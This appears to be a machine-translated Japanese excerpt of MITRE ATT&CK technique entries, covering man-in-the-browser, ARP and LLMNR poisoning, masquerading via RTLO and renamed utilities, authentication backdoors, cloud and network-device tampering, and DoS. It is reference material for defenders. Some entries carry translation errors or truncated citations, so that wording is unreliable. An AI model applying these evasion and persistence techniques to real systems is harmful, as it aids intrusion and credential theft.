T1185 ブラウザの男 敵対者は、さまざまな「マン・イン・ザ・ブラウザ」技術の一環として、セキュリティ上の脆弱性やブラウザソフトウェアに内在する機能を利用して、コンテンツの変更や行動の改変、情報の傍受を行うことができます。(引用:Wikipedia Man in the Browser)

具体的な例としては、敵対者がブラウザにソフトウェアを注入することで、ユーザーのクッキー、HTTPセッション、SSLクライアント証明書を継承し、そのブラウザを使って認証済みのイントラネットにピボットすることが可能になります。(引用:Cobalt Strike Browser Pivot) (引用:ICEBRG Chrome Extensions)

Browser pivotを実行するには、SeDebugPrivilegeと高品位プロセスが必要です。ブラウザのトラフィックは、敵のブラウザからユーザーのブラウザを経由して、HTTPプロキシを設定することで、HTTPおよびHTTPSトラフィックをリダイレクトすることでピボットされます。これにより、ユーザーのトラフィックには何の影響もありません。プロキシの接続は、ブラウザが閉じられると同時に切断されます。プロキシがブラウザのどのプロセスに注入されたとしても、敵はそのプロセスのセキュリティ・コンテクストを仮定する。ブラウザは通常、開いたタブごとに新しいプロセスを作成し、それに応じて権限と証明書が分けられます。これらの権限があれば、敵対者は、ブラウザからアクセス可能で、ブラウザが十分な権限を持っているイントラネット上のあらゆるリソース(Sharepointやウェブメールなど)を閲覧することができます。また、ブラウザ・ピボットは、2ファクタ認証によって提供されるセキュリティを排除します。(引用:コバルトストライクマニュアル)
303
T1557 マンインザミドル 敵対者は、中間者(Man-in-the-Middle: MiTM)技術を使用して、2つ以上のネットワーク機器の間に自らを配置し、[Network Sniffing](https://attack.mitre.org/techniques/T1040)や[Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002)などの後続の動作をサポートしようとする可能性があります。ネットワークトラフィックの流れを決定する一般的なネットワークプロトコルの機能(ARP、DNS、LLMNRなど)を悪用して、敵対者はデバイスに敵対者が制御するシステムを介して通信を行わせ、情報を収集したり、追加のアクションを実行したりすることができます(引用:Rapid7 MiTM Basics)

敵対者は、[Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002)のように、MiTMの立場を利用してトラフィックの変更を試みることができます。また、敵対者は、トラフィックが適切な宛先に流れるのを阻止し、サービス拒否を引き起こすこともあります。
304
T1557.002 Man-in-the-Middle(中間者)。ARPキャッシュポイズニング 敵対者は、アドレス解決プロトコル(ARP)キャッシュをポイズニングして、2つ以上のネットワーク機器の通信の間に位置することがあります。

ARPプロトコルは、IPv4アドレスをメディアアクセスコントロール(MAC)アドレスなどのリンク層アドレスに解決するために使用されます(引用:RFC826 ARP)。ローカルネットワークセグメント内のデバイスは、リンク層アドレスを使用して相互に通信します。あるネットワーク機器が特定のネットワーク機器のリンク層アドレスを持っていない場合、IPアドレスをMACアドレスに変換するために、ローカルネットワークにブロードキャストARPリクエストを送信することがあります。関連するIPアドレスを持つデバイスは、そのMACアドレスを直接返信します。

敵対者は、リクエストしたデバイスのARPキャッシュをポイズンするために、ARPリクエストを受動的に待つことがあります。敵対者は、自分のMACアドレスを返信することで、被害者に意図したネットワーク機器と通信していると思わせて欺くことができます。敵対者がARPキャッシュをポイズンするためには、敵対者の返答が正当なIPアドレス所有者の返答よりも速くなければなりません。

ARPプロトコルはステートレスであり、認証を必要としません。そのため、デバイスはARPキャッシュにIPアドレスのMACアドレスを誤って追加または更新する可能性があります。(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)

敵対者は、中間者(MiTM)ネットワークトラフィックの手段としてARPキャッシュポイズニングを使用する可能性があります。この行為は、認証情報などのデータ、特に安全でない暗号化されていないプロトコルで送信されたデータの収集や中継に使用される可能性があります(引用:Sans ARP Spoofing Aug 2003)
305
T1557.001 Man-in-the-Middle(中間者)。LLMNR/NBT-NSポイゾニングとSMBリレー 敵対者は、LLMNR/NBT-NSのネットワークトラフィックに応答することで、名前解決のための権威あるソースを偽装し、敵対者が制御するシステムとの通信を強要することができます。

Link-Local Multicast Name Resolution(LLMNR)とNetBIOS Name Service(NBT-NS)は、ホストを識別するための代替手段として機能するMicrosoft Windowsのコンポーネントです。LLMNRは、DNS(Domain Name System)の形式に基づいており、同じローカルリンク上のホストが他のホストの名前解決を行うことができます。NBT-NSは、ローカルネットワーク上のシステムをそのNetBIOS名で識別する。(Citation: Wikipedia LLMNR) (Citation: TechNet NetBIOS)

敵対者は、LLMNR (UDP 5355)/NBT-NS (UDP 137) トラフィックに対して、要求されたホストの身元を知っているかのように応答することで、犠牲者のネットワーク上の名前解決のための権威あるソースを偽装することができ、犠牲者が敵対者の制御するシステムと通信するように、効果的にサービスを毒することができます。要求されたホストが識別/認証を必要とするリソースに属している場合、ユーザ名と NTLMv2 ハッシュが敵対者の制御するシステムに送信されます。敵対者は、ポートのトラフィックを監視するツールや[Network Sniffing](https://attack.mitre.org/techniques/T1040)を用いて有線で送信されたハッシュ情報を収集し、[Brute Force](https://attack.mitre.org/techniques/T1110)を用いてオフラインでハッシュを解読し、平文のパスワードを取得することができる。敵対者がシステム間の認証経路にあるシステムにアクセスできる場合や、認証情報を用いた自動スキャンが敵対者の管理するシステムに対して認証を試みる場合、NTLMv2 のハッシュを傍受して中継し、標的となるシステムに対してアクセスしてコードを実行することができる。中継はポイズニングと連動して行われますが、ポイズニングとは無関係の場合もあります。(Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay)

NBNSpoof、Metasploit、[Responder](https://attack.mitre.org/software/S0174)など、ローカルネットワーク内のネームサービスをポイズニングするために使用できるツールがいくつか存在する。(引用:GitHub NBNSpoof) (引用:Rapid7 LLMNR Spoofer) (引用:GitHub Responder)
306
T1036 マスカレード 敵対者は、ユーザーやセキュリティツールから見て、自分の人工物の特徴を操作して、正当なものや良心的なものに見せようとすることがあります。マスカレードとは、正当なものであれ悪意のあるものであれ、防御や観察を逃れるために、オブジェクトの名前や場所を操作したり悪用したりすることです。これには、ファイルのメタデータを操作したり、ユーザーを騙してファイルの種類を誤認させたり、正当なタスクやサービス名を与えたりすることが含まれます。

セキュリティ監視を回避するために、悪用可能なシステムユーティリティの名前を変更することも、[マスカレード](https://attack.mitre.org/techniques/T1036)の一形態です。(引用:LOLBASメインサイト)
307
T1036.001 マスカレード。無効なコード署名 敵対者は、ユーザーやアナリスト、ツールを欺く機会を増やすために、有効なコード署名の特徴を模倣しようとすることがあります。コード署名は、開発者からバイナリの信頼性を確保し、バイナリが改ざんされていないことを保証します。敵対者は、署名されたプログラムのメタデータと署名情報をコピーして、それを署名のないプログラムのテンプレートとして使用することができます。無効なコード署名を持つファイルは、デジタル署名の検証チェックに失敗しますが、ユーザーにはより正当なファイルに見え、セキュリティツールがこれらのファイルを不適切に扱う可能性があります。(引用:Threatexpress MetaTwin 2017)

[コード署名](https://attack.mitre.org/techniques/T1553/002)とは異なり、この活動では有効な署名を得ることはできません。
308
T1036.004 マスカレード(Masquerading)。タスクやサービスのマスカレード 敵対者は、タスクやサービスの名前を操作して、そのタスクやサービスが正当なものであるかのように見せかけることがあります。タスクスケジューラやsystemdによって実行されるタスクやサービスには、通常、名前や説明が与えられます(引用:TechNet Schtasks)(引用:Systemd Service Units)Windowsサービスには、表示名のほかにサービス名があります。多くの良心的なタスクやサービスは、一般的に関連付けられた名前を持っています。

タスクやサービスには、説明などの他のフィールドが含まれており、敵対者はそれらを正当なものに見せかけようとするかもしれません。(引用:Palo Alto Shamoon Nov 2016)(引用:Fysbis Dr Web Analysis)
309
T1036.005 マスカレード。合法的な名前や場所に合わせる 敵対者は、正規のファイルやリソースを命名/配置する際に、その名前や場所を一致させたり、近似させたりすることがあります。これは、防御や監視を回避するために行われます。これは、実行ファイルを一般的に信頼されているディレクトリ(例:System32の下)に配置したり、正当で信頼されているプログラムの名前をつけたりすることで行われます(例:svchost.exe)。コンテナ化された環境では、コンテナポッドやクラスタの命名規則に一致する名前空間にリソースを作成することでも実現できます。また、ファイルやコンテナイメージの名前には、正規のプログラムやイメージに近いものや、無害なものを指定することもできます。

敵対者は、模倣しようとしているファイルと同じアイコンを使用することもできます。
310
T1036.003 マスカレード。名前の変更 システムユーティリティ 敵対者は、正当なシステムユーティリティの名前を変えて、そのユーティリティの使用に関するセキュリティメカニズムを回避しようとすることがあります。敵対者が悪用できるシステム・ユーティリティには、セキュリティの監視・制御機構が設けられている場合があります。(利用する前にユーティリティの名前を変更することで、セキュリティ・メカニズムを回避することができるかもしれません(例:<code>rundll32.exe</code>の名前を変更)。(引用:Elastic Masquerade Ball) 別のケースとして、正規のユーティリティを別のディレクトリにコピーまたは移動し、名前を変更することで、非標準のパスから実行されるシステムユーティリティに基づく検出を回避することができます。(引用:エフセキュア・コジデューク) 311
T1036.002 マスカレード。右から左へのオーバーライド 敵対者は、右から左への上書き(RTLOまたはRLO)文字(U+202E)を使用して、ユーザーをだまし、無害なファイルタイプだと思わせておいて、実際には実行可能コードを実行させることがあります。RTLOとは、その文字に続くテキストを逆に表示させる非印刷文字のことです。(引用:Infosecinstitute RTLO Technique)例えば、<code>March 25 œ202Excod.scr</code>というWindowsのスクリーンセーバーの実行ファイルは、<code>March 25 rcs.docx</code>として表示されます。<code>photo_high_re\u202Egnp.js</code>という名前のJavaScriptファイルは、<code>photo_high_resj.png</code>として表示されます。

この技術の一般的な使用方法は、[Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)/[Malicious File](https://attack.mitre.org/techniques/T1204/002)で、エンドユーザーと防御側の両方が、自分のツールがRTLO文字をどのように表示・レンダリングするかを認識していないと、騙される可能性があるからです。RTLO文字の使用は、多くの標的型侵入の試みや犯罪行為で確認されています。(引用:Trend Micro PLEAD RTLO)(引用:Kaspersky RTLO Cyber Crime) RTLOは、Windowsレジストリでも使用することができます。regedit.exeは反転した文字を表示しますが、コマンドラインツールのreg.exeはデフォルトでは表示しません。
312
T1036.006 マスカレード。ファイル名の後のスペース 敵対者は、ファイルの拡張子を変更することで、プログラムの真のファイルタイプを隠すことができます。

例えば、<code>evil.bin</code>というMach-Oの実行ファイルがある場合、ユーザーがこれをダブルクリックすると、Terminal.appが起動して実行されます。このファイルを<code>evil.txt</code>にリネームした場合、ユーザーがダブルクリックすると、デフォルトのテキスト編集アプリケーションが起動します(バイナリは実行されません)。しかし、ファイル名が<code>evil.txt</code>(末尾のスペースに注意)に変更されている場合、ユーザーがダブルクリックすると、真のファイルタイプがOSによって判断されて適切に処理され、バイナリが実行されます(引用:Mac Backdoors are back)。

敵対者はこの機能を利用して、ユーザーを騙し、あらゆる形式の良さそうなファイルをダブルクリックさせ、最終的に悪意のあるものを実行させることができます。
313
T1556 認証プロセスの変更 侵入者は、認証の仕組みやプロセスを改変して、ユーザの認証情報にアクセスしたり、アカウントへの不当なアクセスを可能にしたりすることがあります。認証プロセスは、WindowsのLSASS(Local Security Authentication Server)プロセスやSAM(Security Accounts Manager)、Unix系システムのPAM(Pluggable Authentication Module)、MacOS系システムの承認プラグインなどのメカニズムによって処理され、認証情報の収集、保存、検証を行います。認証プロセスを変更することで、敵対者は[Valid Accounts](https://attack.mitre.org/techniques/T1078)を使用せずにサービスやシステムを認証できる可能性があります。

敵対者はこのプロセスの一部を悪意を持って変更し、認証情報を明らかにしたり、認証メカニズムを回避したりすることがあります。危殆化した認証情報やアクセスは、ネットワーク内のシステムのさまざまなリソースに設定されたアクセス制御を回避するために使用される可能性があります。また、リモートシステムや、VPN、Outlook Web Access、リモートデスクトップなどの外部から利用可能なサービスへの持続的なアクセスに使用される可能性もあります。
314
T1556.001 認証プロセスを変更する。ドメインコントローラーの認証

マルウェアを使用して、ドメインコントローラの認証プロセスに偽の認証情報を注入し、任意のユーザのアカウントや認証情報にアクセスするためのバックドアを作成することができます(例:[Skeleton Key](https://attack.mitre.org/software/S0007))。スケルトン・キーは、エンタープライズ・ドメイン・コントローラの認証プロセス(LSASS)にパッチを当てて動作させるもので、敵対者が標準的な認証システムを回避するために使用する可能性のある認証情報が含まれています。パッチが適用されると、敵対者は注入されたパスワードを使用して、任意のドメイン・ユーザー・アカウントとして認証に成功します(ドメイン・コントローラの再起動によってスケルトン・キーがメモリから消去されるまで)。認証されたアクセスは、一要素認証環境において、ホストやリソースへの自由なアクセスを可能にする可能性があります。(引用:Dell Skeleton
315
T1556.004 認証プロセスを変更する。ネットワーク機器の認証

[システムイメージの変更](https://attack.mitre.org/techniques/T1601)は、ネットワークデバイスのオペレーティングシステムに、特定のパスワードを使用して敵対者にアクセスを提供するためのコードを埋め込むことができます。 この修正には、パッチを介してOSイメージに挿入される特定のパスワードが含まれます。 認証の際、挿入されたコードはまず、ユーザーの入力がパスワードであるかどうかを確認します。パスワードであれば、アクセスが許可されます。そうでない場合、埋め込まれたコードは、潜在的に有効な認証情報を確認するために認証情報を渡します。(引用:FireEye - Synful Knock
316
T1556.002 認証プロセスを変更する。パスワードフィルターDLL

Windowsのパスワードフィルタは、ドメインアカウントとローカルアカウントの両方に対してパスワードポリシーを実施する仕組みです。フィルターは、潜在的なパスワードをパスワードポリシーに照らして検証する方法を含むDLLとして実装されています。フィルターDLLは、ローカルアカウントの場合はローカルコンピュータに、ドメインアカウントの場合はドメインコントローラに配置できる。Security Accounts Manager (SAM)に新しいパスワードを登録する前に、Local Security Authority (LSA)は、登録された各フィルタに検証を要求する。

敵対者は、悪意のあるパスワードフィルタを登録して、ローカルコンピュータやドメイン全体から認証情報を取得することができます。適切な検証を行うために、フィルタはLSAからプレーンテキストの認証情報を受け取る必要があります。悪意のあるパスワードフィルタは、パスワード要求が行われるたびに、これらの平文の認証情報を受け取ることになります。
317
T1556.003 認証プロセスの変更。プラガブル認証モジュール 侵入者が pluggable authentication module (PAM) を改変してユーザ認証情報にアクセスしたり、アカウントへの不当なアクセスを可能にしたりすることがあります。PAM は、設定ファイル、ライブラリ、実行ファイルで構成されるモジュールシステムで、多くのサービスの認証を行います。最も一般的な認証モジュールは<code>pam_unix.so</code>で、<code>/etc/passwd</code>や<code>/etc/shadow</code>にあるアカウント認証情報を取得、設定、検証します。(引用: Apple PAM)(引用: Man Pam_Unix)(引用: Red Hat PAM)

敵対者は、PAMシステムのコンポーネントを変更してバックドアを作成する可能性があります。<code>pam_unix.so</code>などのPAMコンポーネントにパッチを当てて、任意の敵対者が供給した値を正当な認証情報として受け入れることができます。(引用: PAM Backdoor)

PAMシステムへの悪意のある改変も、認証情報を盗むために悪用される可能性があります。PAM はパスワードを保存しないため、PAM コンポーネントと交換される値は平文である可能性があるため、敵対者は PAM リソースにコードを感染させ、ユーザの認証情報を取得することができます。
318
T1578 クラウド・コンピュート・インフラの変更 敵対者は、防御を回避するために、クラウドアカウントのコンピュートサービスインフラストラクチャを変更しようとする可能性があります。

インフラストラクチャのコンポーネントを変更することで得られるパーミッションは、既存のインフラストラクチャへのアクセスを防止する制限を回避することができます。また、インフラストラクチャのコンポーネントを変更することで、敵対者が検知を回避し、その存在を示す証拠を取り除くことができる可能性があります(引用:Mandiant M-Trends 2020)
319
T1578.002 クラウド・コンピュート・インフラストラクチャの変更クラウドインスタンスの作成 敵対者は、防御を回避するために、クラウドアカウントのコンピュートサービス内に新しいインスタンスや仮想マシン(VM)を作成することがあります。新しいインスタンスを作成すると、アカウント内に現在存在するインスタンスに設定されているファイアウォールのルールや権限を回避できる可能性があります。敵対者は、アカウント内の1つまたは複数のボリュームの[Create Snapshot](https://attack.mitre.org/techniques/T1578/001)を作成し、新しいインスタンスを作成してスナップショットをマウントした後、より制限の少ないセキュリティポリシーを適用して、[Data from Local System](https://attack.mitre.org/techniques/T1005)または[Remote Data Staging](https://attack.mitre.org/techniques/T1074/002)を収集することができます。(引用:Mandiant M-Trends 2020)

新しいインスタンスを作成することで、敵対者は、現在実行中のインスタンスの実行に影響を与えることなく、環境内で悪意のある活動を実行することもできます。
320
T1578.001 Cloud Compute Infrastructureを修正する。スナップショットの作成 敵対者は、防御を回避するために、クラウドのアカウント内にスナップショットやデータバックアップを作成することがあります。スナップショットとは、仮想マシン(VM)、仮想ハードドライブ、ボリュームなど、既存のクラウドコンピュートコンポーネントのポイントインタイムコピーです。敵対者は、[Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004)とは異なり、スナップショットを作成する権限を利用して、既存のコンピュートサービスインフラストラクチャへのアクセスを防止する制限を回避することができます。敵対者は、検出を回避して自分の存在の証拠を取り除くためにスナップショットに戻すことができます。

敵対者は、[Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002)を行い、作成した1つ以上のスナップショットをインスタンスにマウントし、敵対者が作成したインスタンスへのアクセスを許可するポリシーを適用することができます。例えば、ファイアウォールポリシーで、インバウンドおよびアウトバウンドのSSHアクセスを許可するなどです。(引用:Mandiant M-Trends 2020)
321
T1578.003 クラウド・コンピュート・インフラストラクチャを変更する。クラウドインスタンスの削除 敵対者は、検出を回避して自分の存在を示す証拠を取り除くために、悪意のある活動を行った後にクラウドインスタンスを削除することがあります。 インスタンスや仮想マシンを削除すると、インスタンスが復元できない場合、貴重なフォレンジックの成果物や疑わしい行動の他の証拠が削除される可能性があります。

また、敵対者は、目的を達成した後、クラウド・インスタンスを[Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002)し、後にインスタンスを終了させることもあります。(引用:Mandiant M-Trends 2020)
322
T1578.004 クラウド・コンピュート・インフラストラクチャの変更。クラウドインスタンスの復帰 敵対者は、悪意のある活動を行った後に、クラウドのインスタンスに加えた変更を元に戻し、検出を回避して自分の存在を示す証拠を消そうとすることがあります。クラウドベースのインフラなど、高度に仮想化された環境では、クラウド管理ダッシュボードやクラウドAPIを使って、仮想マシン(VM)やデータストレージのスナップショットを復元することで、これを実現することができます。

この手法のもう一つのバリエーションは、コンピュートインスタンスに接続された一時的なストレージを利用することです。ほとんどのクラウドプロバイダーは、永続的、ローカル、エフェメラルなど、さまざまなタイプのストレージを提供しており、エフェメラルタイプのストレージは、VMの停止/再起動時にリセットされることが多いです。
323
T1112 レジストリの変更

レジストリの特定の領域へのアクセスは、アカウントの権限に依存し、一部は管理者レベルのアクセスを必要とします。Windowsに組み込まれているコマンドラインユーティリティ[Reg](https://attack.mitre.org/software/S0075)は、ローカルまたはリモートのレジストリの変更に使用できます。(

レジストリの変更には、キー名の前にヌル文字を付けるなどしてキーを隠す操作も含まれます。この場合、[Reg](https://attack.mitre.org/software/S0075)やWin32 APIを使用する他のユーティリティで読み取る際にエラーが発生したり、無視されたりします。(引用:Microsoft Reghide NOV 2006) 敵対者は、これらの擬似的に隠されたキーを悪用して、永続性を維持するために使用されるペイロードやコマンドを隠すことができます。(引用:TrendMicro POWELIKS AUG 2014) (引用:SpectorOps Hiding Reg Jul 2017)

横移動の一環として、ファイルの実行を支援するために、リモートシステムのレジストリが変更される可能性があります。それには、リモートレジストリサービスがターゲットシステム上で実行されている必要があります。(引用:Microsoft Remote) しばしば[Valid Accounts](https://attack.mitre.org/techniques/T1078)が必要となり、RPC通信のためにリモートシステムの[SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002)へのアクセスも必要となります。
324
T1601 システムイメージの変更 敵対者は、防御力を低下させたり、自分自身のために新しい機能を提供するために、組み込みネットワーク機器のオペレーティングシステムに変更を加えることがあります。

オペレーティングシステムを変更するには、敵対者は通常、この1つのファイルに影響を与え、それを置き換えたり変更したりするだけで済みます。 この作業は、システムのランタイム中にメモリ上で実行してすぐに効果を出すことも、ストレージ上で実行して次回のネットワークデバイスの起動時に変更を実施することも可能です。
325
T1601.002 システムイメージの変更。システムイメージのダウングレード 敵対者は、セキュリティを弱めるために、ネットワーク機器の古いバージョンのOSをインストールすることがあります。 ネットワーク機器の古いバージョンのオペレーティング・システムは、一般的に暗号化が弱く、防御機能の更新も少ないことが多いです。(引用:Cisco Synful Knock Evolution)

組込み機器の場合、バージョンをダウングレードするには、通常、ストレージ内のオペレーティ ング・システム・ファイルを交換するだけで済みます。 ほとんどの組み込み機器では、希望するバージョンのオペレーティング・システム・ファイルのコピーをダウンロードし、次回のシステム再起動時にそのファイルから起動するように機器を再設定することで実現できます。

システムイメージを古いバージョンにダウングレードすることで、[Weaken Encryption](https://attack.mitre.org/techniques/T1600)などの動作を可能にし、防御を回避できる可能性があります。 システムイメージのダウングレードは単独で行うこともできますし、[Patch System Image](https://attack.mitre.org/techniques/T1601/001)と組み合わせて使用することもできます。
326
T1601.001 システムイメージの修正。パッチシステムイメージ 敵対者は、新しい機能を導入したり、既存の防御力を弱めたりするために、ネットワーク機器のオペレーティング・システムを変更することがあります(引用:Killing the myth of Cisco IOS rootkits)(引用:Killing IOS diversity myth)(引用:Cisco IOS Shellcode)(引用:Cisco IOS Forensics Developments)(引用:Juniper Netscreen of the Dead) ネットワーク機器の中には、モノリシック・アーキテクチャで構築されているものがあり、オペレーティング・システム全体と機器の機能の大部分が1つのファイルに含まれています。

ストレージ内のオペレーティング・システムを変更するには、通常、デバイスのオペレータが利用できる標準的な手順を使用します。これには、TFTP、FTP、SCP、コンソール接続など、ネットワークデバイスで使用される一般的なプロトコルを使用して新しいファイルをダウンロードする場合があります。

メモリ上のオペレーティングシステムを変更するには、通常、2つの方法があります。1つ目の方法は、変更されていないオリジナルのオペレーティング・システムのネイティブ・デバッグ・コマンドを利用して、そのオペレーティング・システムを含む関連メモリ・アドレスを直接変更する方法です。 この方法は、通常、デバイスに対する管理者レベルのアクセスを必要とします。

メモリ内のオペレーティングシステムを変更する2つ目の方法では、敵対者はブートローダを利用します。ブートローダーは、デバイスの起動時に最初にロードされるソフトウェアで、これによってオペレーティングシステムが起動されます。 敵対者は、[ROMMONkit](https://attack.mitre.org/techniques/T1542/004)などの方法でブートローダーにあらかじめ埋め込まれた悪意のあるコードを使用して、メモリ内の実行中のオペレーティングシステムコードを直接操作する可能性があります。

システムイメージファイルに格納されている命令を変更することで、既存の防御力を弱めたり、デバイスが以前持っていなかった新しい機能を提供したりすることができます。既存の防御力を低下させる例としては、[Weaken Encryption](https://attack.mitre.org/techniques/T1600)による暗号化、[Network Device Authentication](https://attack.mitre.org/techniques/T1556/004)による認証、[Network Boundary Bridging](https://attack.mitre.org/techniques/T1599)による境界防御などがあります。 敵対者の目的のために新しい機能を追加すると、[Keylogging](https://attack.mitre.org/techniques/T1056/001)、[Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003)、[Port Knocking](https://attack.mitre.org/techniques/T1205/001)などがあります。

また、敵対者は、オペレーティングシステムの既存のコマンドを侵害して、防御者を惑わす偽の出力を生成することもあります。 この方法を[Downgrade System Image](https://attack.mitre.org/techniques/T1601/002)と組み合わせて使用すると、侵害されたシステムコマンドの一例として、現在実行中のオペレーティングシステムのバージョンを示すコマンドの出力を変更することができます。

オペレーティングシステムにパッチを適用する場合、常駐ストレージ(通常は不揮発性のフラッシュメモリ)または[TFTP Boot](https://attack.mitre.org/techniques/T1542/005)を介して行うことができます。

この技術が保存されたコピーではなく、メモリ上の実行中のオペレーティング・システムに対して行われる場合、この技術は再起動後も存続しません。 しかし、オペレーティング・システムのライブ・メモリ・モディフィケーションを[ROMMONkit](https://attack.mitre.org/techniques/T1542/004)と組み合わせることで、持続性を得ることができます。
327
T1104 多段式チャンネル 敵対者は、コマンド&コントロールのために複数のステージを作り、異なる状況下や特定の機能のために使用することがあります。

リモートアクセスツールは、第1段階のコマンド&コントロールサーバにコールバックして指示を仰ぎます。第1段階では、ホストの基本情報の収集、ツールの更新、追加ファイルのアップロードなどの自動化機能を備えている場合があります。この時点で第2のリモートアクセスツール(RAT)をアップロードして、ホストを第2段階のコマンド&コントロールサーバーにリダイレクトすることも可能です。

異なるステージは別々にホストされ、インフラが重複することはないでしょう。ローダーは、元々の第1ステージの通信経路が発見されてブロックされた場合に備えて、バックアップの第1ステージのコールバックまたは[Fallback Channels](https://attack.mitre.org/techniques/T1008)を持っていることもあります。
328
T1106 ネイティブAPI 侵入者は、OSのネイティブなアプリケーション・プログラミング・インターフェース(API)と直接やりとりして、動作を実行することがあります。ネイティブAPIは、ハードウェア/デバイス、メモリ、プロセスなど、カーネル内の低レベルのOSサービスを呼び出すための制御手段を提供します。(引用: NT API Windows)(引用: Linux Kernel API) これらのネイティブAPIは、システムの起動時(他のシステムコンポーネントがまだ初期化されていないとき)や、日常的な操作中のタスクやリクエストを実行する際にOSによって活用されます。

ネイティブAPIが提供する機能は、多くの場合、インターフェースやライブラリを介してユーザーモードのアプリケーションにも公開されます。例えば、Windows APIの<code>CreateProcess()</code>やGNUの<code>fork()</code>などの関数は、プログラムやスクリプトが他のプロセスを開始することを可能にします(引用:Microsoft CreateProcess)(引用:GNU Fork)。(引用: Microsoft Win32)(引用: LIBC)(引用: GLIBC)

Microsoft .NETやmacOS Cocoaなど、ネイティブAPIと対話するための高レベルソフトウェアフレームワークも用意されています。これらのフレームワークは、通常、APIの機能に対する言語ラッパー/抽象化を提供し、コードの使いやすさ/移植性を考慮して設計されています。(引用:Microsoft NET)(引用:Apple Core Services)(引用:MACOS Cocoa)(引用:macOS Foundation)

敵対者は、これらのネイティブAPIの機能を、動作を実行する手段として悪用する可能性があります。Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)と同様に、ネイティブAPIとそのインターフェースの階層は、被害を受けたシステムの様々なコンポーネントと対話し、利用するためのメカニズムを提供します。
329
T1599 ネットワークバウンダリーブリッジング 敵対者は、境界ネットワークデバイスを侵害することで、ネットワークの境界を越えることができます。

ルーターやファイアウォールなどのデバイスを使用して、信頼できるネットワークと信頼できないネットワークの間に境界を設けることができます。 ルーターやファイアウォールは、組織のポリシーに基づいてトラフィックの種類を制限することで、信頼できるネットワークと信頼できないネットワークとの間に境界を設けることができます。 トラフィックの制限は、IPアドレス、レイヤー4のプロトコルポートを禁止したり、アプリケーションを特定するためにディープパケットインスペクションを行うことで実現できます。 ネットワークの残りの部分に参加するために、これらのデバイスは直接アドレスを指定することもできるし、トランスペアレントにすることもできますが、その動作モードは、敵対者が侵害されたときにどのようにバイパスするかには関係ありません。

敵対者がこのような境界デバイスを制御すると、そのポリシーの施行をバイパスして、通常は禁止されているトラフィックを、分離された2つのネットワーク間の信頼境界を支障なく通過させることができます。 デバイス上で十分な権限を得ることで、敵対者は望むトラフィックを許可するようにデバイスを再構成することができ、「マルチホッププロキシ」(https://attack.mitre.org/techniques/T1090/003)によるコマンド&コントロールや「トラフィックデュプリケーション」(https://attack.mitre.org/techniques/T1020/001)によるデータの流出などの目標を達成することができます。 ボーダーデバイスが2つの異なる組織を隔てている場合、敵対者は新たな犠牲者の環境への横方向の移動を促進することもできます。
330
T1599.001 ネットワーク・バウンダリー・ブリッジングネットワーク・アドレス・トランスレーション・トラバーサル 敵対者は、ネットワークデバイスのネットワークアドレス変換(NAT)の設定を変更することで、ネットワークの境界を越えてしまうことがあります。

複数のネットワークを接続するルーターやファイアウォールなどのネットワーク機器は、ネットワーク間でパケットをやり取りする際にNATを実装することがあります。NATを実行すると、ネットワーク機器はIPアドレスのヘッダーの送信元アドレスおよび/または送信先アドレスを書き換えます。ネットワークの設計によっては、パケットが境界線を越えるためにNATを必要とする場合がある。 典型的な例としては、内部ネットワークがインターネットでルーティングできないアドレスを使用している環境が挙げられます。(引用:RFC1918)

敵対者がネットワークの境界装置を制御できるようになった場合、既存のNAT設定を利用して離れた2つのネットワーク間でトラフィックを送信するか、独自のNAT設定を実装するかのどちらかになります。 NAT の機能を必要とするネットワーク設計の場合、敵対者は、通常は境界デバイスの背後にある保護されたシステムへのアクセスを妨げる固有のルーティング制限を克服することができます。 NAT を必要としないネットワーク設計の場合は、アドレス変換を利用して敵対者の活動を不明瞭にすることができます。ネットワークの境界デバイスを通過するパケットのアドレスを変更することで、データ送信の監視が防御側にとって困難になるからです。

敵対者は、[Patch System Image](https://attack.mitre.org/techniques/T1601/001)を使用してネットワークデバイスのオペレーティングシステムを変更し、独自のカスタムNATメカニズムを実装することで、さらに活動を不明瞭にすることができます。
331
T1498 ネットワークDoS攻撃 敵対者は、ネットワークDoS(Denial of Service)攻撃を行い、ユーザーが利用するリソースの機能を低下させたり、ブロックしたりすることがあります。ネットワークDoSは、サービスが依存しているネットワークの帯域幅を使い切ることで実行できます。リソースの例としては、特定のWebサイト、電子メールサービス、DNS、Webベースのアプリケーションなどがあります。敵対者は、政治的な目的(引用:FireEye OpPoisonedHandover February 2016)や、気晴らし(引用:FSISAC FraudNetDoS September 2012)、ハクティビズム、恐喝などの他の悪意のある活動を支援するために、ネットワークDoS攻撃を行うことが観察されています(引用:Symantec DDoS October 2014)

ネットワークDoSは、リソース、またはリソースが依存しているネットワーク接続やネットワーク機器に向けられた悪意のあるトラフィックの量が原因で、システムへのネットワーク接続の帯域幅容量が枯渇した場合に発生します。例えば、インターネットへの接続が1Gbpsのネットワークでホストされているサーバーに、敵対者が10Gbpsのトラフィックを送信したとします。

ネットワークDoS攻撃を行うには、IPアドレスの詐称やボットネットなど、複数の手法にいくつかの側面が当てはまります。

敵対者は、攻撃システムのオリジナルIPアドレスを使用したり、ソースIPアドレスを詐称したりして、攻撃トラフィックから攻撃システムへの遡及を困難にしたり、リフレクションを可能にしたりします。これにより、ネットワーク防御装置のソースアドレスによるフィルタリングの効果が減少または排除されるため、防御者が攻撃を防御する際の難易度が高まります。

ホスティングシステムを直接標的とするDoS攻撃については、[Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499)を参照してください。
332
T1498.001 ネットワーク・デニアル・オブ・サービスダイレクトネットワークフラッド 敵対者は、大量のネットワークトラフィックをターゲットに直接送信することで、サービス拒否(DoS)を引き起こそうとする場合があります。[Direct Network Flood](https://attack.mitre.org/techniques/T1498/001)とは、1つまたは複数のシステムを使用して、標的となるサービスのネットワークに向けて大量のネットワークパケットを送信することです。フラッディングには、ほぼすべてのネットワークプロトコルを使用することができる。

